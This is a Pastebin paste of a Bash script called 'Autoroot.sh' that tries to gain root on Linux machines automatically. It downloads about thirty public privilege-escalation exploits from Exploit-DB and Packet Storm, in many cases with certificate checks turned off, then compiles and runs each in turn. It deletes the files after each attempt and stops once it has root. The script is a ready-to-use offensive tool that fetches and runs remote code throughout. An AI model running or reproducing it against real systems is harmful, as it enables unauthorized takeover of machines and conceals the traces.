Advertisement
_d3f4ult

Autoroot.sh

May 9th, 2016
1,600
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 7.73 KB | None | 0 0
  1. #All exploits are suggested by "Linux Exploit Suggester" and will update according to it.
  2. #Name     : Auto Root
  3. #Author   : Nilotpal Biswas
  4. #Facebook : https://www.facebook.com/nilotpal.biswas.73
  5. #Twitter  : https://twitter.com/nilotpalhacker
  6. #USAGE    : bash autoroot.sh
  7.  
  8. echo "==================================================="
  9. echo "              Auto Root Exploit v1.0"
  10. echo "                by Nilotpal Biswas"
  11. echo "==================================================="
  12.  
  13. checkroot() {
  14. if [ $(id -u) == 0 ]; then
  15. echo
  16. echo "Successfully R00T(ed).. have fun :)"
  17. id=$(id)
  18. echo "ID     => " $id
  19. who=$(whoami)
  20. echo "WHOAMI => " $who
  21. exit
  22. else
  23. echo ""
  24. echo "R00Ting.. wait"
  25. sleep 1
  26. fi
  27. }
  28. echo "Auto R00Ting start..."
  29. checkroot;
  30.  
  31. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/744.c -O exploit.c
  32. gcc -O2 -fomit-frame-pointer exploit.c -o exploit
  33. ./exploit
  34. rm exploit && rm exploit.c
  35. checkroot;
  36.  
  37. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2013.c -O exploit.c
  38. gcc exploit.c -o exploit
  39. ./exploit
  40. rm exploit && rm exploit.c
  41. checkroot;
  42.  
  43. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/1397.c -O exploit.c
  44. gcc -o exploit exploit.c -static -O2
  45. ./exploit
  46. rm exploit && rm exploit.c
  47. checkroot;
  48.  
  49. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/160.c -O exploit.c
  50. gcc -O3 -static -fomit-frame-pointer exploit.c -o exploit
  51. ./exploit
  52. rm exploit && rm exploit.c
  53. checkroot;
  54.  
  55. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15023.c -O exploit.c
  56. gcc exploit.c -o exploit
  57. ./exploit
  58. rm exploit && rm exploit.c
  59. checkroot;
  60.  
  61. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2031.c -O exploit.c
  62. gcc exploit.c -o exploit -static -Wall
  63. ./exploit
  64. rm exploit && rm exploit.c
  65. checkroot;
  66.  
  67. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2004.c -O exploit.c
  68. gcc exploit.c -o exploit
  69. ./exploit
  70. rm exploit && rm exploit.c
  71. checkroot;
  72.  
  73. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2005.c -O exploit.c
  74. gcc exploit.c -o exploit
  75. ./exploit
  76. rm exploit && rm exploit.c
  77. checkroot;
  78.  
  79. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2006.c -O exploit.c
  80. gcc exploit.c -o exploit -Wall
  81. ./exploit
  82. rm exploit && rm exploit.c
  83. checkroot;
  84.  
  85. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/5092.c -O exploit.c
  86. gcc exploit.c -o exploit &  gcc exploit.c -o exploit -static -Wno-format
  87. ./exploit
  88. rm exploit && rm exploit.c
  89. checkroot;
  90.  
  91. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/5093.c -O exploit.c
  92. gcc exploit.c -o exploit
  93. ./exploit
  94. rm exploit && rm exploit.c
  95. checkroot;
  96.  
  97. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/6851.c -O exploit.c
  98. gcc exploit.c -o exploit
  99. ./exploit
  100. rm exploit && rm exploit.c
  101. checkroot;
  102.  
  103. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/14814.c -O exploit.c
  104. gcc exploit.c -o exploit
  105. ./exploit
  106. rm exploit && rm exploit.c
  107. checkroot;
  108.  
  109. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15285.c -O exploit.c
  110. gcc exploit.c -o exploit
  111. ./exploit
  112. rm exploit && rm exploit.c
  113. checkroot;
  114.  
  115. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/6851.c -O exploit.c
  116. gcc exploit.c -o exploit
  117. ./exploit
  118. rm exploit && rm exploit.c
  119. checkroot;
  120.  
  121. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/17787.c -O exploit.c
  122. gcc exploit.c -o exploit -lrt
  123. ./exploit
  124. rm exploit && rm exploit.c
  125. checkroot;
  126.  
  127. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15916.c -O exploit.c
  128. gcc -w exploit.c -o exploit
  129. ./exploit
  130. rm exploit && rm exploit.c
  131. checkroot;
  132.  
  133. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15150.c -O exploit.c
  134. gcc exploit.c -o exploit
  135. ./exploit
  136. rm exploit && rm exploit.c
  137. checkroot;
  138.  
  139. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15024.c -O exploit.c
  140. gcc exploit.c -o exploit
  141. ./exploit
  142. rm exploit && rm exploit.c
  143. checkroot;
  144.  
  145. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/18411.c -O exploit.c
  146. gcc exploit.c -o exploit
  147. ./exploit
  148. rm exploit && rm exploit.c
  149. checkroot;
  150.  
  151. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/25444.c -O exploit.c
  152. gcc -O2 exploit.c
  153. ./a.out
  154. rm a.out && rm exploit.c
  155. checkroot;
  156.  
  157. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/26131.c -O exploit.c
  158. gcc exploit.c -o exploit
  159. ./exploit
  160. rm exploit && rm exploit.c
  161. checkroot;
  162.  
  163. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/lin_amd64/local/27297.c -O exploit.c
  164. gcc exploit.c -o exploit
  165. ./exploit
  166. rm exploit && rm exploit.c
  167. checkroot;
  168.  
  169. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/31346.c -O exploit.c
  170. gcc exploit.c -o exploit
  171. ./exploit
  172. rm exploit && rm exploit.c
  173. checkroot;
  174.  
  175. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2011.sh -O exploit.sh
  176. bash exploit.sh
  177. rm exploit.sh && rm *.c
  178. checkroot;
  179.  
  180. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/8369.sh -O exploit.sh
  181. bash exploit.sh
  182. rm exploit.sh && rm *.c
  183. checkroot;
  184.  
  185. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/8478.sh -O exploit.sh
  186. bash exploit.sh
  187. rm exploit.sh && rm exploit.c
  188. checkroot;
  189.  
  190. wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/12130.py -O exploit.py
  191. python exploit.py
  192. rm exploit.py && rm *.c
  193. checkroot;
  194.  
  195. wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz
  196. tar -xvf 9436.tgz
  197. bash run.sh
  198. rm run.sh && rm run.c && rm exploit.c && rm 9436.tgz
  199. checkroot;
  200.  
  201. wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz
  202. tar -xvf 9435.tgz
  203. cd wunderbar_emporium/
  204. bash wunderbar_emporium.sh
  205. cd ..
  206. rm wunderbar_emporium & rm 9435.tgz
  207. checkroot;
  208.  
  209. wget http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c -O exploit.c
  210. gcc exploit.c -lutil -lpthread
  211. ./a.out
  212. rm a.out && rm exploit.c
  213. checkroot;
  214.  
  215. echo
  216. echo "Srry..:( I tried hard, but no luck this time.. Wait for update"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement